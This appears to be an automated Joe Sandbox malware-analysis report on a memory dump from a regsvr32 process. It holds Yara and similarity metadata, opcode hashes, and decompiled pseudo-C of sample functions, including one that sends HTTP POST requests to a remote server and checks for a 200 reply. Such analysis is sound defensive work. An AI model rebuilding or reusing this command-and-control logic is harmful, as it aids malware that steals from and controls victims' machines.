                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                        • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                        • API String ID: 667068680-129414566
                                                                                                                                                                        • Opcode ID: 1842b4d10df27f54f4a0f45b9d17f63055bdb785f0f5328c1a80e7584807216d
                                                                                                                                                                        • Instruction ID: 14f57213146b32529256035dc625beca754cbf62297528241a8d0d306c4ca087
                                                                                                                                                                        • Opcode Fuzzy Hash: 1842b4d10df27f54f4a0f45b9d17f63055bdb785f0f5328c1a80e7584807216d
                                                                                                                                                                        • Instruction Fuzzy Hash: 34118272A4130A77DB1197E49D41FDEB6AC9F84750F5900B0EB00F7180EA71FA518BA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                        			E049EF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                        				char _v16;
                                                                                                                                                                        				char _v20;
                                                                                                                                                                        				char _v24;
                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                        				intOrPtr _v40;
                                                                                                                                                                        				intOrPtr _v44;
                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                        				char _v56;
                                                                                                                                                                        				int _v68;
                                                                                                                                                                        				void* _v72;
                                                                                                                                                                        				intOrPtr _v92;
                                                                                                                                                                        				int _v96;
                                                                                                                                                                        				void* _v100;
                                                                                                                                                                        				intOrPtr _v104;
                                                                                                                                                                        				intOrPtr _v108;
                                                                                                                                                                        				char* _v112;
                                                                                                                                                                        				char _v116;
                                                                                                                                                                        				char _v132;
                                                                                                                                                                        				void _v388;
                                                                                                                                                                        				void _v644;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				intOrPtr* _t105;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				signed int _t111;
                                                                                                                                                                        				signed int _t112;
                                                                                                                                                                        				intOrPtr _t115;
                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                        				char _t117;
                                                                                                                                                                        				intOrPtr _t119;
                                                                                                                                                                        				char _t122;
                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                        				signed int _t129;
                                                                                                                                                                        				intOrPtr _t135;
                                                                                                                                                                        				intOrPtr _t139;
                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                        				intOrPtr _t145;
                                                                                                                                                                        				intOrPtr _t147;
                                                                                                                                                                        				intOrPtr _t153;
                                                                                                                                                                        				intOrPtr _t155;
                                                                                                                                                                        				intOrPtr _t159;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t165;
                                                                                                                                                                        				intOrPtr _t179;
                                                                                                                                                                        				signed int _t186;
                                                                                                                                                                        				char _t188;
                                                                                                                                                                        				signed int _t189;
                                                                                                                                                                        				void* _t190;
                                                                                                                                                                        				char _t193;
                                                                                                                                                                        				signed int _t194;
                                                                                                                                                                        				signed int _t195;
                                                                                                                                                                        				void* _t196;
                                                                                                                                                                        
                                                                                                                                                                        				_v24 = 4;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v28 = 1;
                                                                                                                                                                        				_t190 = __edx;
                                                                                                                                                                        				memset( &_v388, 0, 0x100);
                                                                                                                                                                        				memset( &_v644, 0, 0x100);
                                                                                                                                                                        				_v56 = E049E9DD8(0xd62);
                                                                                                                                                                        				_v52 = E049E9DD8(0x8e9);
                                                                                                                                                                        				_v48 = E049E9DD8(0xa93);
                                                                                                                                                                        				_v44 = E049E9DD8(0x9a9);
                                                                                                                                                                        				_t94 = E049E9DD8(0xb64);
                                                                                                                                                                        				_v36 = _v36 & 0;
                                                                                                                                                                        				_t188 = 0x3c;
                                                                                                                                                                        				_v40 = _t94;
                                                                                                                                                                        				E049E8D6D( &_v116, 0, 0x100);
                                                                                                                                                                        				_v108 = 0x10;
                                                                                                                                                                        				_v112 =  &_v132;
                                                                                                                                                                        				_v116 = _t188;
                                                                                                                                                                        				_v100 =  &_v388;
                                                                                                                                                                        				_v96 = 0x100;
                                                                                                                                                                        				_v72 =  &_v644;
                                                                                                                                                                        				_push( &_v116);
                                                                                                                                                                        				_push(0);
                                                                                                                                                                        				_v68 = 0x100;
                                                                                                                                                                        				_push(E049EA43D(_t190));
                                                                                                                                                                        				_t102 =  *0x49ff838; // 0x0
                                                                                                                                                                        				_push(_t190);
                                                                                                                                                                        				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                        					_t104 = 0;
                                                                                                                                                                        					__eflags = 0;
                                                                                                                                                                        					_v12 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t105 =  *0x49ff838; // 0x0
                                                                                                                                                                        						_v8 = 0x8404f700;
                                                                                                                                                                        						_t189 =  *_t105( *0x49ff920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                        						__eflags = _t189;
                                                                                                                                                                        						if(_t189 != 0) {
                                                                                                                                                                        							E049EF73E(_t189);
                                                                                                                                                                        							_t110 =  *0x49ff838; // 0x0
                                                                                                                                                                        							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
                                                                                                                                                                        							__eflags = _a24;
                                                                                                                                                                        							_t165 = _t111;
                                                                                                                                                                        							if(_a24 != 0) {
                                                                                                                                                                        								E049EA065(_a24);
                                                                                                                                                                        							}
                                                                                                                                                                        							__eflags = _t165;
                                                                                                                                                                        							if(_t165 != 0) {
                                                                                                                                                                        								__eflags = _v104 - 4;
                                                                                                                                                                        								_t112 = 0x8484f700;
                                                                                                                                                                        								if(_v104 != 4) {
                                                                                                                                                                        									_t112 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t115 =  *0x49ff838; // 0x0
                                                                                                                                                                        								_t116 =  *((intOrPtr*)(_t115 + 0x20))(_t165, "POST",  &_v644, 0, 0,  &_v56, _t112, 0);
                                                                                                                                                                        								_v8 = _t116;
                                                                                                                                                                        								__eflags = _a24;
                                                                                                                                                                        								if(_a24 != 0) {
                                                                                                                                                                        									E049EA065(_a24);
                                                                                                                                                                        									_t116 = _v8;
                                                                                                                                                                        								}
                                                                                                                                                                        								__eflags = _t116;
                                                                                                                                                                        								if(_t116 != 0) {
                                                                                                                                                                        									__eflags = _v104 - 4;
                                                                                                                                                                        									if(_v104 == 4) {
                                                                                                                                                                        										E049EF6EC(_t116);
                                                                                                                                                                        									}
                                                                                                                                                                        									_t117 = E049E9DD8(0x901);
                                                                                                                                                                        									_t193 = _t117;
                                                                                                                                                                        									_v16 = _t193;
                                                                                                                                                                        									_t119 =  *0x49ff838; // 0x0
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									_v8 =  *((intOrPtr*)(_t119 + 0x24))(_t194, _t193, E049EA43D(_t193), _a4, _a8);
                                                                                                                                                                        									E049E8B9C( &_v16);
                                                                                                                                                                        									__eflags = _a24;
                                                                                                                                                                        									if(_a24 != 0) {
                                                                                                                                                                        										E049EA065(_a24);
                                                                                                                                                                        									}
                                                                                                                                                                        									__eflags = _v8;
                                                                                                                                                                        									if(_v8 != 0) {
                                                                                                                                                                        										L25:
                                                                                                                                                                        										_t122 = 8;
                                                                                                                                                                        										_v24 = _t122;
                                                                                                                                                                        										_v20 = 0;
                                                                                                                                                                        										_v16 = 0;
                                                                                                                                                                        										E049E8D6D( &_v20, 0, _t122);
                                                                                                                                                                        										_t127 =  *0x49ff838; // 0x0
                                                                                                                                                                        										__eflags =  *((intOrPtr*)(_t127 + 0xc))(_t194, 0x13,  &_v20,  &_v24, 0);
                                                                                                                                                                        										if(__eflags != 0) {
                                                                                                                                                                        											_t129 = E049E9F6F( &_v20, __eflags);
                                                                                                                                                                        											__eflags = _t129 - 0xc8;
                                                                                                                                                                        											if(_t129 == 0xc8) {
                                                                                                                                                                        												 *_a20 = _t194;
                                                                                                                                                                        												 *_a12 = _t189;
                                                                                                                                                                        												 *_a16 = _t165;
                                                                                                                                                                        												__eflags = 0;
                                                                                                                                                                        												return 0;
                                                                                                                                                                        											}
                                                                                                                                                                        											_v12 =  ~_t129;
                                                                                                                                                                        											L29:
                                                                                                                                                                        											_t135 =  *0x49ff838; // 0x0
                                                                                                                                                                        											 *((intOrPtr*)(_t135 + 8))(_t194);
                                                                                                                                                                        											_t195 = _v12;
                                                                                                                                                                        											L30:
                                                                                                                                                                        											__eflags = _t165;
                                                                                                                                                                        											if(_t165 != 0) {
                                                                                                                                                                        												_t139 =  *0x49ff838; // 0x0
                                                                                                                                                                        												 *((intOrPtr*)(_t139 + 8))(_t165);
                                                                                                                                                                        											}
                                                                                                                                                                        											__eflags = _t189;
                                                                                                                                                                        											if(_t189 != 0) {
                                                                                                                                                                        												_t179 =  *0x49ff838; // 0x0
                                                                                                                                                                        												 *((intOrPtr*)(_t179 + 8))(_t189);
                                                                                                                                                                        											}
                                                                                                                                                                        											return _t195;
                                                                                                                                                                        										}
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_v12 = 0xfffffff8;
                                                                                                                                                                        										goto L29;
                                                                                                                                                                        									} else {
                                                                                                                                                                        										GetLastError();
                                                                                                                                                                        										_t143 =  *0x49ff838; // 0x0
                                                                                                                                                                        										 *((intOrPtr*)(_t143 + 8))(_t194);
                                                                                                                                                                        										_t145 =  *0x49ff838; // 0x0
                                                                                                                                                                        										_v8 = _v8 & 0x00000000;
                                                                                                                                                                        										 *((intOrPtr*)(_t145 + 8))(_t165);
                                                                                                                                                                        										_t147 =  *0x49ff838; // 0x0
                                                                                                                                                                        										_t165 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										 *((intOrPtr*)(_t147 + 8))(_t189);
                                                                                                                                                                        										_t194 = _v8;
                                                                                                                                                                        										goto L21;
                                                                                                                                                                        									}
                                                                                                                                                                        								} else {
                                                                                                                                                                        									GetLastError();
                                                                                                                                                                        									_t153 =  *0x49ff838; // 0x0
                                                                                                                                                                        									 *((intOrPtr*)(_t153 + 8))(_t165);
                                                                                                                                                                        									_t155 =  *0x49ff838; // 0x0
                                                                                                                                                                        									_t165 = 0;
                                                                                                                                                                        									 *((intOrPtr*)(_t155 + 8))(_t189);
                                                                                                                                                                        									_t189 = 0;
                                                                                                                                                                        									_t194 = _v8;
                                                                                                                                                                        									goto L22;
                                                                                                                                                                        								}
                                                                                                                                                                        							} else {
                                                                                                                                                                        								GetLastError();
                                                                                                                                                                        								_t159 =  *0x49ff838; // 0x0
                                                                                                                                                                        								 *((intOrPtr*)(_t159 + 8))(_t189);
                                                                                                                                                                        								L21:
                                                                                                                                                                        								_t189 = 0;
                                                                                                                                                                        								__eflags = 0;
                                                                                                                                                                        								goto L22;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        						GetLastError();
                                                                                                                                                                        						L22:
                                                                                                                                                                        						_t186 = _t194;
                                                                                                                                                                        						_t104 = _v12 + 1;
                                                                                                                                                                        						_v12 = _t104;
                                                                                                                                                                        						__eflags = _t104 - 2;
                                                                                                                                                                        					} while (_t104 < 2);
                                                                                                                                                                        					__eflags = _t186;
                                                                                                                                                                        					if(_t186 != 0) {
                                                                                                                                                                        						goto L25;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t195 = 0xfffffffe;
                                                                                                                                                                        					goto L30;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t163 = 0xfffffffc;
                                                                                                                                                                        				return _t163;
                                                                                                                                                                        			}
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 049EF7D7
                                                                                                                                                                        • memset.MSVCRT ref: 049EF7E8
                                                                                                                                                                          • Part of subcall function 049E8D6D: memset.MSVCRT ref: 049E8D7F
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 049EF8BF
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$ErrorLast
                                                                                                                                                                        • String ID: POST
                                                                                                                                                                        • API String ID: 2570506013-1814004025
                                                                                                                                                                        • Opcode ID: 9faef6025c1ead8f4fc0b82a9cdb2406170372a0fccb6aac80f9e54145c1cebe
                                                                                                                                                                        • Instruction ID: 3baa30c5c85b3d9dd45bc47fcb1b5e54aa6d1938c45469cf541ee108218cf720
                                                                                                                                                                        • Opcode Fuzzy Hash: 9faef6025c1ead8f4fc0b82a9cdb2406170372a0fccb6aac80f9e54145c1cebe
                                                                                                                                                                        • Instruction Fuzzy Hash: 00A13EB1A00218AFDB12DFA5D848BFE7BB8EF48314F10447AE905E7254DB35AE45CB50
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000001A.00000002.494976271.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_26_2_49e0000_regsvr32.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _snprintfqsort
                                                                                                                                                                        • String ID: %I64d$false$null$true
                                                                                                                                                                        • API String ID: 756996078-4285102228
                                                                                                                                                                        • Opcode ID: 5495c167347e6929a6c43f1dc80e1eba3b7d55343b62afb87945a18cc83d87d5
                                                                                                                                                                        • Instruction ID: 5b36f9b183d30f02129e7983450112d1f8537d151d4090d47f4952296ea005b4
                                                                                                                                                                        • Opcode Fuzzy Hash: 5495c167347e6929a6c43f1dc80e1eba3b7d55343b62afb87945a18cc83d87d5
                                                                                                                                                                        • Instruction Fuzzy Hash: C1E14AB1A0020AFBEF119FA4DD46EAB3B69EF84354F008435FE1596140E631FE619BE1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 85%
                                                                                                                                                                        			E049E50B3(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                        				void _v532;
                                                                                                                                                                        				char _v548;
                                                                                                                                                                        				char _v580;
                                                                                                                                                                        				char _v584;
                                                                                                                                                                        				signed int _v588;
                                                                                                                                                                        				intOrPtr _v592;
                                                                                                                                                                        				WCHAR* _v596;
                                                                                                                                                                        				char _v600;
                                                                                                                                                                        				intOrPtr _v604;
                                                                                                                                                                        				char _v632;
                                                                                                                                                                        				char _v636;
                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                        				char _t63;
                                                                                                                                                                        				intOrPtr _t65;
                                                                                                                                                                        				intOrPtr _t66;
                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                        				void* _t76;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				signed int _t78;
                                                                                                                                                                        				intOrPtr _t79;
                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                        				intOrPtr _t82;
                                                                                                                                                                        				WCHAR* _t84;
                                                                                                                                                                        				intOrPtr _t94;
                                                                                                                                                                        				intOrPtr _t95;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                        				signed char _t104;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				intOrPtr _t108;
                                                                                                                                                                        				intOrPtr _t110;
                                                                                                                                                                        				void* _t113;
                                                                                                                                                                        				void* _t114;
                                                                                                                                                                        				WCHAR* _t115;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				WCHAR* _t130;
                                                                                                                                                                        				intOrPtr _t142;
                                                                                                                                                                        				void* _t143;
                                                                                                                                                                        				void* _t163;
                                                                                                                                                                        				signed int _t166;
                                                                                                                                                                        				void* _t167;
                                                                                                                                                                        				void* _t169;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				signed int _t174;
                                                                                                                                                                        				WCHAR* _t176;
                                                                                                                                                                        				signed int _t177;
                                                                                                                                                                        				signed int _t178;
                                                                                                                                                                        				intOrPtr* _t180;
                                                                                                                                                                        				signed int _t182;
                                                                                                                                                                        				void* _t185;
                                                                                                                                                                        				void* _t186;
                                                                                                                                                                        				WCHAR** _t187;
                                                                                                                                                                        				void* _t192;
                                                                                                                                                                        
                                                                                                                                                                        				_t192 = __fp0;
                                                                                                                                                                        				_push(_t177);
                                                                                                                                                                        				_t113 = __edx;
                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                        				_t178 = _t177 | 0xffffffff;
                                                                                                                                                                        				memset( &_v532, 0, 0x20c);
                                                                                                                                                                        				_v588 = _v588 & 0x00000000;
                                                                                                                                                                        				_t185 = (_t182 & 0xfffffff8) - 0x254 + 0xc;
                                                                                                                                                                        				_v596 = 1;
                                                                                                                                                                        				if(_t173 != 0) {
                                                                                                                                                                        					_t108 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        					_t5 = _t108 + 0x110; // 0x4bf16b8
                                                                                                                                                                        					_t110 =  *0x49ff820; // 0x4befaa0
                                                                                                                                                                        					_v604 =  *((intOrPtr*)(_t110 + 0x68))(_t173,  *((intOrPtr*)( *_t5)));
                                                                                                                                                                        				}
                                                                                                                                                                        				if(E049EC9F4(_t173) != 0) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t56 = E049EC6CE();
                                                                                                                                                                        					_push(_t113);
                                                                                                                                                                        					_v592 = _t56;
                                                                                                                                                                        					E049EC4C1(_t56,  &_v580, _t190, _t192);
                                                                                                                                                                        					_t114 = E049E5072( &_v580,  &_v580, _t190);
                                                                                                                                                                        					_t126 = E049EE2C5( &_v580, E049EA43D( &_v580), 0);
                                                                                                                                                                        					E049EC6E4(_t126,  &_v548, _t192);
                                                                                                                                                                        					_push(_t126);
                                                                                                                                                                        					_t161 =  &_v580;
                                                                                                                                                                        					_t63 = E049E317E(_t173,  &_v580, _t190, _t192);
                                                                                                                                                                        					_v600 = _t63;
                                                                                                                                                                        					if(_t63 != 0) {
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t114);
                                                                                                                                                                        						_push(0x49fc9a0);
                                                                                                                                                                        						_t115 = E049E9A5A(_t63);
                                                                                                                                                                        						_t186 = _t185 + 0x10;
                                                                                                                                                                        						_t65 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        						__eflags =  *((intOrPtr*)(_t65 + 0x214)) - 3;
                                                                                                                                                                        						if( *((intOrPtr*)(_t65 + 0x214)) != 3) {
                                                                                                                                                                        							L12:
                                                                                                                                                                        							__eflags = _v596;
                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                        								_t66 = E049E98BD(_v600);
                                                                                                                                                                        								_t130 = _t115;
                                                                                                                                                                        								 *0x49ff8d8 = _t66;
                                                                                                                                                                        								 *0x49ff8d0 = E049E98BD(_t130);
                                                                                                                                                                        								L17:
                                                                                                                                                                        								_push(_t130);
                                                                                                                                                                        								_t174 = E049EA633( &_v532, _t173, _t192, _v592,  &_v584,  &_v600);
                                                                                                                                                                        								_t187 = _t186 + 0x10;
                                                                                                                                                                        								__eflags = _t174;
                                                                                                                                                                        								if(_t174 == 0) {
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        								_push(0x49fc9f2);
                                                                                                                                                                        								_t163 = 0xe;
                                                                                                                                                                        								E049EAAA3(_t163, _t192);
                                                                                                                                                                        								E049EAADC(_t174, _t192, _t115);
                                                                                                                                                                        								_t180 = _a4;
                                                                                                                                                                        								_push( *_t180);
                                                                                                                                                                        								E049EAA7E(0xb);
                                                                                                                                                                        								_t165 =  *(_t180 + 0x10);
                                                                                                                                                                        								__eflags =  *(_t180 + 0x10);
                                                                                                                                                                        								if( *(_t180 + 0x10) != 0) {
                                                                                                                                                                        									E049EB025(_t165, _t192);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t166 =  *(_t180 + 0xc);
                                                                                                                                                                        								__eflags = _t166;
                                                                                                                                                                        								if(_t166 != 0) {
                                                                                                                                                                        									E049EB025(_t166, _t192);
                                                                                                                                                                        								}
                                                                                                                                                                        								_t76 = E049EA065(0);
                                                                                                                                                                        								_push(_t166);
                                                                                                                                                                        								_t167 = 2;
                                                                                                                                                                        								_t77 = E049EAA50();
                                                                                                                                                                        								__eflags = _v596;
                                                                                                                                                                        								_t142 = _t76;
                                                                                                                                                                        								if(_v596 == 0) {
                                                                                                                                                                        									_t142 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t142 + 0xa4)) - 1;
                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                        										_t78 = E049F0D7E(_t77, _t115, _t167, _t192, 0, _t115, 0);
                                                                                                                                                                        										_t187 =  &(_t187[3]);
                                                                                                                                                                        										goto L26;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t142 = _t142 + 0x228;
                                                                                                                                                                        									goto L25;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t79 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        									__eflags =  *((intOrPtr*)(_t79 + 0xa4)) - 1;
                                                                                                                                                                        									if(__eflags != 0) {
                                                                                                                                                                        										L32:
                                                                                                                                                                        										__eflags =  *(_t79 + 0x1898) & 0x00000082;
                                                                                                                                                                        										if(( *(_t79 + 0x1898) & 0x00000082) != 0) {
                                                                                                                                                                        											_t169 = 0x64;
                                                                                                                                                                        											E049EF0DE(_t169);
                                                                                                                                                                        										}
                                                                                                                                                                        										E049E584B( &_v580, _t192);
                                                                                                                                                                        										_t176 = _a8;
                                                                                                                                                                        										_t143 = _t142;
                                                                                                                                                                        										__eflags = _t176;
                                                                                                                                                                        										if(_t176 != 0) {
                                                                                                                                                                        											_t82 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        											__eflags =  *((intOrPtr*)(_t82 + 0xa0)) - 1;
                                                                                                                                                                        											if( *((intOrPtr*)(_t82 + 0xa0)) != 1) {
                                                                                                                                                                        												lstrcpyW(_t176, _t115);
                                                                                                                                                                        											} else {
                                                                                                                                                                        												_t84 = E049E109A(_t143, 0x49f);
                                                                                                                                                                        												_v596 = _t84;
                                                                                                                                                                        												lstrcpyW(_t176, _t84);
                                                                                                                                                                        												E049E8BAF( &_v596);
                                                                                                                                                                        												 *_t187 = 0x49fc9b0;
                                                                                                                                                                        												lstrcatW(_t176, ??);
                                                                                                                                                                        												lstrcatW(_t176, _t115);
                                                                                                                                                                        												lstrcatW(_t176, 0x49fc9b0);
                                                                                                                                                                        											}
                                                                                                                                                                        										}
                                                                                                                                                                        										_t81 = _a12;
                                                                                                                                                                        										__eflags = _t81;
                                                                                                                                                                        										if(_t81 != 0) {
                                                                                                                                                                        											 *_t81 = _v592;
                                                                                                                                                                        										}
                                                                                                                                                                        										_t178 = 0;
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										goto L41;
                                                                                                                                                                        									}
                                                                                                                                                                        									_t40 = _t79 + 0x228; // 0x4befe10
                                                                                                                                                                        									_t142 = _t40;
                                                                                                                                                                        									L25:
                                                                                                                                                                        									_t78 = E049E5AC0(_t142, _t115, __eflags);
                                                                                                                                                                        									L26:
                                                                                                                                                                        									__eflags = _t78;
                                                                                                                                                                        									if(_t78 >= 0) {
                                                                                                                                                                        										_t79 =  *0x49ff81c; // 0x4befbe8
                                                                                                                                                                        										goto L32;
                                                                                                                                                                        									}
                                                                                                                                                                        									_push(0xfffffffd);
                                                                                                                                                                        									L6:
                                                                                                                                                                        									_pop(_t178);
                                                                                                                                                                        									goto L41;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        							_t94 = E049ED11F(_v592, __eflags);
                                                                                                                                                                        							_v600 = _t94;
                                                                                                                                                                        							_t95 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        							_t96 =  *((intOrPtr*)(_t95 + 0xdc))(_t94, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
                                                                                                                                                                        							__eflags = _t96 - _t178;
                                                                                                                                                                        							if(_t96 != _t178) {
                                                                                                                                                                        								_t97 =  *0x49ff818; // 0x4bef8b0
                                                                                                                                                                        								 *((intOrPtr*)(_t97 + 0x30))();
                                                                                                                                                                        								E049E8BF4( &_v636, _t178);
                                                                                                                                                                        								_t130 = _t96;
                                                                                                                                                                        								goto L17;
                                                                                                                                                                        							}
                                                                                                                                                                        							E049E8BF4( &_v632, _t178);
                                                                                                                                                                        							_t72 = 1;
                                                                                                                                                                        							goto L42;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t18 = _t65 + 0x1898; // 0x0
                                                                                                                                                                        						_t104 =  *_t18;
                                                                                                                                                                        						__eflags = _t104 & 0x00000004;
                                                                                                                                                                        						if((_t104 & 0x00000004) == 0) {
                                                                                                                                                                        							__eflags = _t104;
                                                                                                                                                                        							if(_t104 != 0) {
                                                                                                                                                                        								goto L12;
                                                                                                                                                                        							}
                                                                                                                                                                        							L11:
                                                                                                                                                                        							E049EF1F6(_v600, _t161);
                                                                                                                                                                        							goto L12;
                                                                                                                                                                        						}
                                                                                                                                                                        						E049EF1B6(_v600,  &_v580);
                                                                                                                                                                        						goto L11;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push(0xfffffffe);
                                                                                                                                                                        					goto L6;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t107 = E049E3097( &_v532, _t178, 0x105);
                                                                                                                                                                        					_t190 = _t107;
                                                                                                                                                                        					if(_t107 == 0) {
                                                                                                                                                                        						L41:
                                                                                                                                                                        						E049E5F6F( &_v588);
                                                                                                                                                                        						_t72 = _t178;
                                                                                                                                                                        						L42:
                                                                                                                                                                        						return _t72;
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        			}
                                                                                                                                                                        0x049e5274
                                                                                                                                                                        0x049e5276
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e527c
                                                                                                                                                                        0x049e5283
                                                                                                                                                                        0x049e5286
                                                                                                                                                                        0x049e528f
                                                                                                                                                                        0x049e5294
                                                                                                                                                                        0x049e529a
                                                                                                                                                                        0x049e529f
                                                                                                                                                                        0x049e52a4
                                                                                                                                                                        0x049e52a8
                                                                                                                                                                        0x049e52aa
                                                                                                                                                                        0x049e52ae
                                                                                                                                                                        0x049e52ae
                                                                                                                                                                        0x049e52b3
                                                                                                                                                                        0x049e52b6
                                                                                                                                                                        0x049e52b8
                                                                                                                                                                        0x049e52bc
                                                                                                                                                                        0x049e52bc
                                                                                                                                                                        0x049e52c3
                                                                                                                                                                        0x049e52c8
                                                                                                                                                                        0x049e52cc
                                                                                                                                                                        0x049e52cf
                                                                                                                                                                        0x049e52d4
                                                                                                                                                                        0x049e52da
                                                                                                                                                                        0x049e52db
                                                                                                                                                                        0x049e5303
                                                                                                                                                                        0x049e5309
                                                                                                                                                                        0x049e5310
                                                                                                                                                                        0x049e531f
                                                                                                                                                                        0x049e5324
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e5324
                                                                                                                                                                        0x049e5312
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x049e52dd
                                                                                                                                                                        0x049e52dd
                                                                                                                                                                        0x049e52e2
                                                                                                                                                                        0x049e52e9
                                                                                                                                                                        0x049e532e
                                                                                                                                                                        0x049e532e
                                                                                                                                                                        0x049e5335
                                                                                                                                                                        0x049e5339
                                                                                                                                                                        0x049e533a
                                                                                                                                                                        0x049e533a
                                                                                                                                                                        0x049e5344
                                                                                                                                                                        0x049e5349
                                                                                                                                                                        0x049e534c
                                                                                                                                                                        0x049e534d
                                                                                                                                                                        0x049e534f
                                                                                                                                                                        0x049e5351
                                                                                                                                                                        0x049e5356
                                                                                                                                                                        0x049e535d
                                                                                                                                                                        0x049e53a0
                                                                                                                                                                        0x049e535f
                                                                                                                                                                        0x049e5364
                                                                                                                                                                        0x049e536c
                                                                                                                                                                        0x049e5370
                                                                                                                                                                        0x049e537b
                                                                                                                                                                        0x049e5386
                                                                                                                                                                        0x049e538e
                                                                                                                                                                        0x049e5392
                                                                                                                                                                        0x049e539a
                                                                                                                                                                        0x049e539a
                                                                                                                                                                        0x049e535d
                                                                                                                                                                        0x049e53a6
                                                                                                                                                                        0x049e53a9
                                                                                                                                                                        0x049e53ab
                                                                                                                                                                        0x049e53b1
                                                                                                                                                                        0x049e53b1
                                                                                                                                                                        0x049e53b3
